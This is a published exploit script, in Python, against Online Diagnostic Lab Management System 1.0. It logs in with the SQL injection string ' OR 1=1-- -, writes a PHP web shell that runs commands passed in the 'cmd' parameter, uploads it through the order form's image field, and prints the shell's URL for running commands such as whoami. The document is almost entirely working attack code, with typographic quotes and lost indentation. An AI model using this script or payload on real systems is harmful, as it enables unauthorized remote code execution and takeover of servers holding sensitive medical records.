Online Diagnostic Lab Management System 1.0 SQL Injection / Shell Upload

# Exploit Title: Online Diagnostic Lab Management System – Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: N/A
# Date: 2022-9-23
# Exploit Author: yousef alraddadi – https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
# Tested on: windows 11 – XAMPP
# CVE : N/A
# Version: 1.0
# Authentication Required: bypass login with sql injection

#/usr/bin/python3

import requests
import os
import sys
import time
import random

# clean screen
os.system(“cls”)
os.system(“clear”)

logo = ”’
##################################################################
# #
# Exploit Script ( Online Diagnostic Lab Management System ) #
# #
##################################################################
”’
print(logo)

url = str(input(“Enter website url : “))
username = (“‘ OR 1=1– -“)
password = (“test”)

req = requests.Session()

target = url+”/diagnostic/login.php”
data = {‘username’:username,’password’:password}

website = req.post(target,data=data)
files = open(“rev.php”,”w”)
payload = “<?php system($_GET[‘cmd’]);?>”
files.write(payload)
files.close()

hash = random.getrandbits(128)
name_file = str(hash)+”.php”
if “Login Successfully” in website.text:

print(“[+] Login Successfully”)
website_1 = url+”/diagnostic/php_action/createOrder.php”

upload_file = {
“orderDate”: (None,””),
“clientName”: (None,””),
“clientContact” : (None,””),
“productName[]” : (None,””),
“rateValue[]” : (None,””),
“quantity[]” : (None,””),
“totalValue[]” : (None,””),
“subTotalValue” : (None,””),
“totalAmountValue” : (None,””),
“discount” : (None,””),
“grandTotalValue” : (None,””),
“gstn” : (None,””),
“vatValue” : (None,””),
“paid” : (None,””),
“dueValue” : (None,””),
“paymentType” : (None,””),
“paymentStatus” : (None,””),
“paymentPlace” : (None,””),
“productImage” : (name_file,open(“rev.php”,”rb”))
}

up = req.post(website_1,files=upload_file)
print(“[+] Check here file shell => “+url+”/diagnostic/assets/myimages/”+name_file)
print(“[+] can exect command here => “+url+”/diagnostic/assets/myimages/”+name_file+”?cmd=whoami”)
else:
print(“[-] Check username or password”)